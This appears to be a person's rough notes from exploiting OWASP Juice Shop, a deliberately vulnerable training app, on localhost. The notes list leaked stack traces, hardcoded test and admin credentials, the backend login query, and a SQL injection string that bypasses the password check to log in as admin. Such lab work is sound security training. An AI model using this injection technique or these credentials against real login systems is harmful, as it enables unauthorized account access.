http://localhost:3000/#/score-board

http://localhost:3000/ftp/

Revealed start trace:

403 Error: Only .md and .pdf files are allowed!

       at verify (/juice-shop/build/routes/fileServer.js:59:18)
       at /juice-shop/build/routes/fileServer.js:43:13
       at Layer.handle [as handle_request] (/juice-shop/node_modules/express/lib/router/layer.js:95:5)
       at trim_prefix (/juice-shop/node_modules/express/lib/router/index.js:328:13)
       at /juice-shop/node_modules/express/lib/router/index.js:286:9
       at param (/juice-shop/node_modules/express/lib/router/index.js:365:14)
       at param (/juice-shop/node_modules/express/lib/router/index.js:376:14)
       at router.process_params (/juice-shop/node_modules/express/lib/router/index.js:421:3)
       at next (/juice-shop/node_modules/express/lib/router/index.js:280:10)
       at /juice-shop/node_modules/serve-index/index.js:149:39
       at FSReqCallback.oncomplete (node:fs:196:5)

Express ^4.22.1 - Vuln

Stack 

{
    "error": {
        "message": "Unexpected path: /rest/products/reviews",
        "stack": "Error: Unexpected path: /rest/products/reviews\n    at /juice-shop/build/routes/angular.js:42:18\n    at Layer.handle [as handle_request] (/juice-shop/node_modules/express/lib/router/layer.js:95:5)\n    at trim_prefix (/juice-shop/node_modules/express/lib/router/index.js:328:13)\n    at /juice-shop/node_modules/express/lib/router/index.js:286:9\n    at router.process_params (/juice-shop/node_modules/express/lib/router/index.js:346:12)\n    at next (/juice-shop/node_modules/express/lib/router/index.js:280:10)\n    at /juice-shop/build/routes/verify.js:208:5\n    at Layer.handle [as handle_request] (/juice-shop/node_modules/express/lib/router/layer.js:95:5)\n    at trim_prefix (/juice-shop/node_modules/express/lib/router/index.js:328:13)\n    at /juice-shop/node_modules/express/lib/router/index.js:286:9\n    at router.process_params (/juice-shop/node_modules/express/lib/router/index.js:346:12)\n    at next (/juice-shop/node_modules/express/lib/router/index.js:280:10)\n    at /juice-shop/build/routes/verify.js:111:5\n    at Layer.handle [as handle_request] (/juice-shop/node_modules/express/lib/router/layer.js:95:5)\n    at trim_prefix (/juice-shop/node_modules/express/lib/router/index.js:328:13)\n    at /juice-shop/node_modules/express/lib/router/index.js:286:9\n    at router.process_params (/juice-shop/node_modules/express/lib/router/index.js:346:12)\n    at next (/juice-shop/node_modules/express/lib/router/index.js:280:10)\n    at logger (/juice-shop/node_modules/morgan/index.js:144:5)\n    at Layer.handle [as handle_request] (/juice-shop/node_modules/express/lib/router/layer.js:95:5)\n    at trim_prefix (/juice-shop/node_modules/express/lib/router/index.js:328:13)\n    at /juice-shop/node_modules/express/lib/router/index.js:286:9"
    }
}

testingUsername="testing@juice-sh.op";testingPassword="IamUsedForTesting"

admin@juice-sh.op / admin123

bernard2@bernard.bernard / bernard

john@juice-sh.op / admin

injection

SELECT * FROM Users WHERE email = 'email' AND password = 'b54aec7aa025d07993c1e95ce57fce91' AND deletedAt IS NULL

Login as admin:

=> SELECT * FROM Users WHERE email = 'admin@juice-sh.op' OR email= '' AND password = 'b54aec7aa025d07993c1e95ce57fce91' AND deletedAt IS NULL

admin@juice-sh.op' OR email= '

Wallet

owasp1234

?fields=password